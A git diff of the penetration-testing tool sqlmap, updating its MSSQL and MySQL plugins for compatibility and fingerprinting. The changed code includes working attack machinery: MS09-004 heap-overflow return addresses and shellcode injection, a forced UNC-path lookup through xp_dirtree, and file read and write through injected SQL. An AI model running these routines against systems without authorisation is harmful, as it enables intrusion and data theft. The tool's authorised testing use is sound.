"+".join("%s(%d)" % ("CHAR" if ord(value[i]) < 256 else "NCHAR", ord(value[i])) for i in xrange(len(value))) + return "+".join("%s(%d)" % ("CHAR" if _ < 128 else "NCHAR", _) for _ in getOrds(value)) return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/mssqlserver/takeover.py b/plugins/dbms/mssqlserver/takeover.py index 05a9d04312b..53c1b078720 100644 --- a/plugins/dbms/mssqlserver/takeover.py +++ b/plugins/dbms/mssqlserver/takeover.py @@ -1,13 +1,15 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import binascii from lib.core.common import Backend +from lib.core.compat import xrange +from lib.core.convert import getBytes from lib.core.data import logger from lib.core.exception import SqlmapUnsupportedFeatureException from lib.request import inject @@ -20,32 +22,33 @@ def __init__(self): GenericTakeover.__init__(self) def uncPathRequest(self): - #inject.goStacked("EXEC master..xp_fileexist '%s'" % self.uncPath, silent=True) + # inject.goStacked("EXEC master..xp_fileexist '%s'" % self.uncPath, silent=True) inject.goStacked("EXEC master..xp_dirtree '%s'" % self.uncPath) def spHeapOverflow(self): """ References: - * http://www.microsoft.com/technet/security/bulletin/MS09-004.mspx - * http://support.microsoft.com/kb/959420 + * https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-004 + * https://support.microsoft.com/en-us/help/959420/ms09-004-vulnerabilities-in-microsoft-sql-server-could-allow-remote-co """ returns = { - # 2003 Service Pack 0 - "2003-0": (""), + # 2003 Service Pack 0 + "2003-0": (""), - # 2003 Service Pack 1 - "2003-1": ("CHAR(0xab)+CHAR(0x2e)+CHAR(0xe6)+CHAR(0x7c)", "CHAR(0xee)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0xb5)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x13)+CHAR(0xe4)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)" ), + # 2003 Service Pack 1 + "2003-1": ("CHAR(0xab)+CHAR(0x2e)+CHAR(0xe6)+CHAR(0x7c)", "CHAR(0xee)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0xb5)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x13)+CHAR(0xe4)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)"), - # 2003 Service Pack 2 updated at 12/2008 - #"2003-2": ("CHAR(0xe4)+CHAR(0x37)+CHAR(0xea)+CHAR(0x7c)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)" ), + # 2003 Service Pack 2 updated at 12/2008 + # "2003-2": ("CHAR(0xe4)+CHAR(0x37)+CHAR(0xea)+CHAR(0x7c)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)"), - # 2003 Service Pack 2 updated at 05/2009 - "2003-2": 
("CHAR(0xc3)+CHAR(0xdb)+CHAR(0x67)+CHAR(0x77)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x47)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)"), + # 2003 Service Pack 2 updated at 05/2009 + "2003-2": ("CHAR(0xc3)+CHAR(0xdb)+CHAR(0x67)+CHAR(0x77)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x47)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)"), + + # 2003 Service Pack 2 updated at 09/2009 + # "2003-2": ("CHAR(0xc3)+CHAR(0xc2)+CHAR(0xed)+CHAR(0x7c)", "CHAR(0xf3)+CHAR(0xd9)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x99)+CHAR(0xc8)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)"), + } - # 2003 Service Pack 2 updated at 09/2009 - #"2003-2": ("CHAR(0xc3)+CHAR(0xc2)+CHAR(0xed)+CHAR(0x7c)", "CHAR(0xf3)+CHAR(0xd9)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x99)+CHAR(0xc8)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)"), - } addrs = None for versionSp, data in returns.items(): @@ -57,7 +60,7 @@ def spHeapOverflow(self): break - if addrs is None: + if not addrs: errMsg = "sqlmap can not exploit the stored procedure buffer " errMsg += "overflow because it does not have a valid return " errMsg += "code for the underlying operating system (Windows " @@ -65,7 +68,7 @@ def spHeapOverflow(self): raise SqlmapUnsupportedFeatureException(errMsg) shellcodeChar = "" - hexStr = binascii.hexlify(self.shellcodeString[:-1]) + hexStr = binascii.hexlify(getBytes(self.shellcodeString[:-1])) for hexPair in xrange(0, len(hexStr), 2): shellcodeChar += "CHAR(0x%s)+" % hexStr[hexPair:hexPair + 2] diff --git a/plugins/dbms/mysql/__init__.py b/plugins/dbms/mysql/__init__.py index 4f03e754ea0..21e2f4550b0 100644 --- a/plugins/dbms/mysql/__init__.py +++ b/plugins/dbms/mysql/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.enums import DBMS @@ -23,17 +23,13 @@ class MySQLMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Take def __init__(self): self.excludeDbsList = MYSQL_SYSTEM_DBS self.sysUdfs = { - # UDF name: UDF return data-type - "sys_exec": { "return": "int" }, - "sys_eval": { "return": "string" }, - "sys_bineval": { "return": "int" } - } + # UDF name: UDF return data-type + "sys_exec": {"return": "int"}, + "sys_eval": {"return": "string"}, + "sys_bineval": {"return": "int"} + } - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) + for cls in self.__class__.__bases__: + cls.__init__(self) 
unescaper[DBMS.MYSQL] = Syntax.escape diff --git a/plugins/dbms/mysql/connector.py b/plugins/dbms/mysql/connector.py index 54327d9d95e..459ff23d5bc 100644 --- a/plugins/dbms/mysql/connector.py +++ b/plugins/dbms/mysql/connector.py @@ -1,17 +1,20 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ try: import pymysql -except ImportError: +except: pass import logging +import struct +import sys +from lib.core.common import getSafeExString from lib.core.data import conf from lib.core.data import logger from lib.core.exception import SqlmapConnectionException @@ -19,34 +22,30 @@ class Connector(GenericConnector): """ - Homepage: http://code.google.com/p/pymysql/ - User guide: http://code.google.com/p/pymysql/ - API: http://code.google.com/p/pymysql/ - Debian package: <none> + Homepage: https://github.com/PyMySQL/PyMySQL + User guide: https://pymysql.readthedocs.io/en/latest/ + Debian package: python3-pymysql License: MIT Possible connectors: http://wiki.python.org/moin/MySQL """ - def __init__(self): - GenericConnector.__init__(self) - def connect(self): self.initConnection() try: - self.connector = pymysql.connect(host=self.hostname, user=self.user, passwd=self.password, db=self.db, port=self.port, connect_timeout=conf.timeout, use_unicode=True) - except (pymysql.OperationalError, pymysql.InternalError), msg: - raise SqlmapConnectionException(msg[1]) + self.connector = pymysql.connect(host=self.hostname, user=self.user, passwd=self.password.encode(sys.stdin.encoding), db=self.db, port=self.port, connect_timeout=conf.timeout, use_unicode=True) + except (pymysql.OperationalError, pymysql.InternalError, pymysql.ProgrammingError, struct.error) as ex: + raise SqlmapConnectionException(getSafeExString(ex)) self.initCursor() - self.connected() + self.printConnected() def fetchall(self): try: return self.cursor.fetchall() - except pymysql.ProgrammingError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + except pymysql.ProgrammingError as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) return None def execute(self, query): @@ -55,10 +54,10 @@ def execute(self, query): try: self.cursor.execute(query) retVal = True - except (pymysql.OperationalError, pymysql.ProgrammingError), msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) - except pymysql.InternalError, msg: - raise SqlmapConnectionException(msg[1]) + except (pymysql.OperationalError, pymysql.ProgrammingError) as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + except pymysql.InternalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) self.connector.commit() diff --git a/plugins/dbms/mysql/enumeration.py b/plugins/dbms/mysql/enumeration.py index 6edc88d1463..129b1e6106a 100644 --- a/plugins/dbms/mysql/enumeration.py +++ b/plugins/dbms/mysql/enumeration.py @@ -1,12 +1,11 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from plugins.generic.enumeration import Enumeration as GenericEnumeration class 
Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) + pass diff --git a/plugins/dbms/mysql/filesystem.py b/plugins/dbms/mysql/filesystem.py index 301fd3c69a8..acde3cc35c9 100644 --- a/plugins/dbms/mysql/filesystem.py +++ b/plugins/dbms/mysql/filesystem.py @@ -1,54 +1,61 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from lib.core.agent import agent +from lib.core.common import getSQLSnippet from lib.core.common import isNumPosStrValue from lib.core.common import isTechniqueAvailable +from lib.core.common import popValue +from lib.core.common import pushValue from lib.core.common import randomStr from lib.core.common import singleTimeWarnMessage +from lib.core.compat import xrange from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.decorators import stackedmethod from lib.core.enums import CHARSET_TYPE +from lib.core.enums import DBMS from lib.core.enums import EXPECTED from lib.core.enums import PAYLOAD from lib.core.enums import PLACE from lib.core.exception import SqlmapNoneDataException from lib.request import inject +from lib.request.connect import Connect as Request from lib.techniques.union.use import unionUse from plugins.generic.filesystem import Filesystem as GenericFilesystem class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) - def nonStackedReadFile(self, rFile): - infoMsg = "fetching file: '%s'" % rFile - logger.info(infoMsg) + if not kb.bruteMode: + infoMsg = "fetching file: '%s'" % rFile + logger.info(infoMsg) - result = inject.getValue("SELECT HEX(LOAD_FILE('%s'))" % rFile, charsetType=CHARSET_TYPE.HEXADECIMAL) + result = inject.getValue("HEX(LOAD_FILE('%s'))" % rFile, charsetType=CHARSET_TYPE.HEXADECIMAL) return result - def stackedReadFile(self, rFile): - infoMsg = "fetching file: '%s'" % rFile - logger.info(infoMsg) + def stackedReadFile(self, remoteFile): + if not kb.bruteMode: + infoMsg = "fetching file: '%s'" % remoteFile + logger.info(infoMsg) self.createSupportTbl(self.fileTblName, self.tblField, "longtext") self.getRemoteTempPath() tmpFile = "%s/tmpf%s" % (conf.tmpPath, randomStr(lowercase=True)) - debugMsg = "saving hexadecimal encoded content of file '%s' " % rFile + debugMsg = "saving hexadecimal encoded content of file '%s' " % remoteFile debugMsg += "into temporary file '%s'" % tmpFile logger.debug(debugMsg) - inject.goStacked("SELECT HEX(LOAD_FILE('%s')) INTO DUMPFILE '%s'" % (rFile, tmpFile)) + inject.goStacked("SELECT HEX(LOAD_FILE('%s')) INTO DUMPFILE '%s'" % (remoteFile, tmpFile)) debugMsg = "loading the content of hexadecimal encoded file " - debugMsg += "'%s' into support table" % rFile + debugMsg += "'%s' into support table" % remoteFile logger.debug(debugMsg) inject.goStacked("LOAD DATA INFILE '%s' INTO TABLE %s FIELDS TERMINATED BY '%s' (%s)" % (tmpFile, self.fileTblName, randomStr(10), self.tblField)) @@ -56,57 +63,89 @@ def stackedReadFile(self, rFile): if not isNumPosStrValue(length): warnMsg = "unable to retrieve the content of the " - warnMsg += "file '%s'" % rFile + warnMsg += "file '%s'" % remoteFile if conf.direct or isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): - warnMsg += ", going to fall-back to simpler UNION technique" - logger.warn(warnMsg) - result = self.nonStackedReadFile(rFile) + if not 
kb.bruteMode: + warnMsg += ", going to fall-back to simpler UNION technique" + logger.warning(warnMsg) + result = self.nonStackedReadFile(remoteFile) else: raise SqlmapNoneDataException(warnMsg) else: length = int(length) - sustrLen = 1024 + chunkSize = 1024 - if length > sustrLen: + if length > chunkSize: result = [] - for i in xrange(1, length, sustrLen): - chunk = inject.getValue("SELECT MID(%s, %d, %d) FROM %s" % (self.tblField, i, sustrLen, self.fileTblName), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL) - + for i in xrange(1, length, chunkSize): + chunk = inject.getValue("SELECT MID(%s, %d, %d) FROM %s" % (self.tblField, i, chunkSize, self.fileTblName), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL) result.append(chunk) else: result = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.fileTblName), resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL) return result - def unionWriteFile(self, wFile, dFile, fileType, forceCheck=False): + @stackedmethod + def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): logger.debug("encoding file to its hexadecimal string value") - fcEncodedList = self.fileEncode(wFile, "hex", True) + fcEncodedList = self.fileEncode(localFile, "hex", True) fcEncodedStr = fcEncodedList[0] fcEncodedStrLen = len(fcEncodedStr) if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000: - warnMsg = "the injection is on a GET parameter and the file " + warnMsg = "as the injection is on a GET parameter and the file " warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen warnMsg += "bytes, this might cause errors in the file " warnMsg += "writing process" - logger.warn(warnMsg) + logger.warning(warnMsg) - debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile) + debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile) logger.debug(debugMsg) - sqlQuery = "%s INTO DUMPFILE '%s'" % (fcEncodedStr, dFile) + pushValue(kb.forceWhere) + kb.forceWhere = PAYLOAD.WHERE.NEGATIVE + sqlQuery = "%s INTO DUMPFILE '%s'" % (fcEncodedStr, remoteFile) unionUse(sqlQuery, unpack=False) + kb.forceWhere = popValue() warnMsg = "expect junk characters inside the " warnMsg += "file as a leftover from UNION query" singleTimeWarnMessage(warnMsg) - return self.askCheckWrittenFile(wFile, dFile, forceCheck) + return self.askCheckWrittenFile(localFile, remoteFile, forceCheck) - def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False): + def linesTerminatedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): + logger.debug("encoding file to its hexadecimal string value") + + fcEncodedList = self.fileEncode(localFile, "hex", True) + fcEncodedStr = fcEncodedList[0][2:] + fcEncodedStrLen = len(fcEncodedStr) + + if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000: + warnMsg = "the injection is on a GET parameter and the file " + warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen + warnMsg += "bytes, this might cause errors in the file " + warnMsg += "writing process" + logger.warning(warnMsg) + + debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile) + logger.debug(debugMsg) + + query = getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=remoteFile, HEXSTRING=fcEncodedStr) + query = agent.prefixQuery(query) # Note: No need for suffix as 'write_file_limit' already ends with comment (required) + payload = agent.payload(newValue=query) + Request.queryPage(payload, content=False, 
raise404=False, silent=True, noteResponseTime=False) + + warnMsg = "expect junk characters inside the " + warnMsg += "file as a leftover from original query" + singleTimeWarnMessage(warnMsg) + + return self.askCheckWrittenFile(localFile, remoteFile, forceCheck) + + def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): debugMsg = "creating a support table to write the hexadecimal " debugMsg += "encoded file to" logger.debug(debugMsg) @@ -114,7 +153,7 @@ def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False): self.createSupportTbl(self.fileTblName, self.tblField, "longblob") logger.debug("encoding file to its hexadecimal string value") - fcEncodedList = self.fileEncode(wFile, "hex", False) + fcEncodedList = self.fileEncode(localFile, "hex", False) debugMsg = "forging SQL statements to write the hexadecimal " debugMsg += "encoded file to the support table" @@ -124,13 +163,15 @@ def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False): logger.debug("inserting the hexadecimal encoded file to the support table") + inject.goStacked("SET GLOBAL max_allowed_packet = %d" % (1024 * 1024)) # 1MB (Note: https://github.com/sqlmapproject/sqlmap/issues/3230) + for sqlQuery in sqlQueries: inject.goStacked(sqlQuery) - debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile) + debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile) logger.debug(debugMsg) # Reference: http://dev.mysql.com/doc/refman/5.1/en/select.html - inject.goStacked("SELECT %s FROM %s INTO DUMPFILE '%s'" % (self.tblField, self.fileTblName, dFile), silent=True) + inject.goStacked("SELECT %s FROM %s INTO DUMPFILE '%s'" % (self.tblField, self.fileTblName, remoteFile), silent=True) - return self.askCheckWrittenFile(wFile, dFile, forceCheck) + return self.askCheckWrittenFile(localFile, remoteFile, forceCheck) diff --git a/plugins/dbms/mysql/fingerprint.py b/plugins/dbms/mysql/fingerprint.py index 9987cabad9b..1876779edef 100644 --- a/plugins/dbms/mysql/fingerprint.py +++ b/plugins/dbms/mysql/fingerprint.py @@ -1,24 +1,27 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re from lib.core.common import Backend from lib.core.common import Format -from lib.core.common import getUnicode -from lib.core.common import randomInt +from lib.core.common import hashDBRetrieve +from lib.core.common import hashDBWrite +from lib.core.compat import xrange +from lib.core.convert import getUnicode from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.enums import DBMS +from lib.core.enums import FORK +from lib.core.enums import HASHDB_KEYS from lib.core.enums import OS from lib.core.session import setDbms from lib.core.settings import MYSQL_ALIASES -from lib.core.settings import UNKNOWN_DBMS_VERSION from lib.request import inject from plugins.generic.fingerprint import Fingerprint as GenericFingerprint @@ -30,78 +33,98 @@ def _commentCheck(self): infoMsg = "executing %s comment injection fingerprint" % DBMS.MYSQL logger.info(infoMsg) - randInt = randomInt() - result = inject.checkBooleanExpression("%d=%d/* NoValue */" % (randInt, randInt)) + result = inject.checkBooleanExpression("[RANDNUM]=[RANDNUM]/* NoValue */") if not result: warnMsg = "unable to perform %s comment injection" % DBMS.MYSQL - 
logger.warn(warnMsg) + logger.warning(warnMsg) return None - # MySQL valid versions updated on 04/2011 + # Reference: https://downloads.mysql.com/archives/community/ + # Reference: https://dev.mysql.com/doc/relnotes/mysql/<major>.<minor>/en/ + versions = ( - (32200, 32235), # MySQL 3.22 - (32300, 32359), # MySQL 3.23 - (40000, 40032), # MySQL 4.0 - (40100, 40131), # MySQL 4.1 - (50000, 50092), # MySQL 5.0 - (50100, 50156), # MySQL 5.1 - (50400, 50404), # MySQL 5.4 - (50500, 50521), # MySQL 5.5 - (50600, 50604), # MySQL 5.6 - (60000, 60014), # MySQL 6.0 - ) - - index = -1 - for i in xrange(len(versions)): - element = versions[i] - version = element[0] - randInt = randomInt() - version = getUnicode(version) - result = inject.checkBooleanExpression("%d=%d/*!%s AND %d=%d*/" % (randInt, randInt, version, randInt, randInt + 1)) - - if result: - break - else: - index += 1 + (90300, 90302), # MySQL 9.3 + (90200, 90202), # MySQL 9.2 + (90100, 90102), # MySQL 9.1 + (90000, 90002), # MySQL 9.0 + (80400, 80406), # MySQL 8.4 + (80300, 80302), # MySQL 8.3 + (80200, 80202), # MySQL 8.2 + (80100, 80102), # MySQL 8.1 + (80000, 80043), # MySQL 8.0 + (60000, 60014), # MySQL 6.0 + (50700, 50745), # MySQL 5.7 + (50600, 50652), # MySQL 5.6 + (50500, 50563), # MySQL 5.5 + (50400, 50404), # MySQL 5.4 + (50100, 50174), # MySQL 5.1 + (50000, 50097), # MySQL 5.0 + (40100, 40131), # MySQL 4.1 + (40000, 40032), # MySQL 4.0 + (32300, 32359), # MySQL 3.23 + (32200, 32235), # MySQL 3.22 + ) + + found = False + for candidate in versions: + result = inject.checkBooleanExpression("[RANDNUM]=[RANDNUM]/*!%d AND [RANDNUM1]=[RANDNUM2]*/" % candidate[0]) - if index >= 0: - prevVer = None + if not result: + found = True + break - for version in xrange(versions[index][0], versions[index][1] + 1): - randInt = randomInt() + if found: + for version in xrange(candidate[1], candidate[0] - 1, -1): version = getUnicode(version) - result = inject.checkBooleanExpression("%d=%d/*!%s AND %d=%d*/" % (randInt, randInt, version, randInt, randInt + 1)) - - if result: - if not prevVer: - prevVer = version + result = inject.checkBooleanExpression("[RANDNUM]=[RANDNUM]/*!%s AND [RANDNUM1]=[RANDNUM2]*/" % version) + if not result: if version[0] == "3": - midVer = prevVer[1:3] + midVer = version[1:3] else: - midVer = prevVer[2] + midVer = version[2] - trueVer = "%s.%s.%s" % (prevVer[0], midVer, prevVer[3:]) + trueVer = "%s.%s.%s" % (version[0], midVer, version[3:]) return trueVer - prevVer = version - return None def getFingerprint(self): + fork = hashDBRetrieve(HASHDB_KEYS.DBMS_FORK) + + if fork is None: + if inject.checkBooleanExpression("VERSION() LIKE '%MariaDB%'"): + fork = FORK.MARIADB + elif inject.checkBooleanExpression("VERSION() LIKE '%TiDB%'"): + fork = FORK.TIDB + elif inject.checkBooleanExpression("@@VERSION_COMMENT LIKE '%drizzle%'"): + fork = FORK.DRIZZLE + elif inject.checkBooleanExpression("@@VERSION_COMMENT LIKE '%Percona%'"): + fork = FORK.PERCONA + elif inject.checkBooleanExpression("@@VERSION_COMMENT LIKE '%Doris%'"): + fork = FORK.DORIS + elif inject.checkBooleanExpression("@@VERSION_COMMENT LIKE '%StarRocks%'"): + fork = FORK.STARROCKS + elif inject.checkBooleanExpression("AURORA_VERSION() LIKE '%'"): # Reference: https://aws.amazon.com/premiumsupport/knowledge-center/aurora-version-number/ + fork = FORK.AURORA + else: + fork = "" + + hashDBWrite(HASHDB_KEYS.DBMS_FORK, fork) + value = "" wsOsFp = Format.getOs("web server", kb.headersFp) - if wsOsFp: + if wsOsFp and not conf.api: value += "%s\n" % wsOsFp if kb.data.banner: 
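
The reworked _commentCheck() above still leans on MySQL executable comments: /*!NNNNN ...*/ is parsed only when the server build is at least NNNNN, so a payload such as [RANDNUM]=[RANDNUM]/*!80000 AND [RANDNUM1]=[RANDNUM2]*/ evaluates false exactly on servers new enough to execute the comment body. A standalone sketch of that narrowing logic, where expression_is_true() is a hypothetical stand-in for inject.checkBooleanExpression() and the ranges are a small subset of the table above:

# sketch: narrow down the MySQL build number via executable-comment probes
SERVER_BUILD = 80036  # assume the target runs MySQL 8.0.36

def expression_is_true(version_tag):
    # the comment body only runs when SERVER_BUILD >= version_tag,
    # and running it appends a false conjunct to the expression
    return SERVER_BUILD < version_tag

RANGES = (
    (80000, 80043),  # MySQL 8.0
    (50700, 50745),  # MySQL 5.7
    (50600, 50652),  # MySQL 5.6
)

def comment_fingerprint():
    for low, high in RANGES:
        if not expression_is_true(low):           # build is at least `low`
            for version in range(high, low - 1, -1):
                if not expression_is_true(version):
                    return version                # highest tag the server still executes
    return None

print(comment_fingerprint())  # 80036, i.e. 8.0.36
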
dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) - if dbmsOsFp: + if dbmsOsFp and not conf.api: value += "%s\n" % dbmsOsFp value += "back-end DBMS: " @@ -109,6 +132,8 @@ def getFingerprint(self): if not conf.extensiveFp: value += actVer + if fork: + value += " (%s fork)" % fork return value comVer = self._commentCheck() @@ -120,19 +145,23 @@ def getFingerprint(self): value += "\n%scomment injection fingerprint: %s" % (blank, comVer) if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None + banVer = kb.bannerFp.get("dbmsVersion") - if re.search("-log$", kb.data.banner): - banVer += ", logging enabled" + if banVer: + if banVer and re.search(r"-log$", kb.data.banner or ""): + banVer += ", logging enabled" - banVer = Format.getDbms([banVer] if banVer else None) - value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) htmlErrorFp = Format.getErrorParsedDBMSes() if htmlErrorFp: value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + if fork: + value += "\n%sfork fingerprint: %s" % (blank, fork) + return value def checkDbms(self): @@ -146,20 +175,11 @@ def checkDbms(self): * http://dev.mysql.com/doc/refman/6.0/en/news-6-0-x.html (manual has been withdrawn) """ - if not conf.extensiveFp and (Backend.isDbmsWithin(MYSQL_ALIASES) \ - or conf.dbms in MYSQL_ALIASES) and Backend.getVersion() and \ - Backend.getVersion() != UNKNOWN_DBMS_VERSION: - v = Backend.getVersion().replace(">", "") - v = v.replace("=", "") - v = v.replace(" ", "") - - Backend.setVersion(v) - + if not conf.extensiveFp and Backend.isDbmsWithin(MYSQL_ALIASES): setDbms("%s %s" % (DBMS.MYSQL, Backend.getVersion())) - if Backend.isVersionGreaterOrEqualThan("5"): + if Backend.isVersionGreaterOrEqualThan("5") or inject.checkBooleanExpression("DATABASE() LIKE SCHEMA()"): kb.data.has_information_schema = True - self.getBanner() return True @@ -167,27 +187,46 @@ def checkDbms(self): infoMsg = "testing %s" % DBMS.MYSQL logger.info(infoMsg) - randInt = getUnicode(randomInt(1)) - result = inject.checkBooleanExpression("QUARTER(NULL) IS NULL") + result = inject.checkBooleanExpression("IFNULL(QUARTER(NULL),NULL XOR NULL) IS NULL") if result: infoMsg = "confirming %s" % DBMS.MYSQL logger.info(infoMsg) - result = inject.checkBooleanExpression("USER() LIKE USER()") + result = 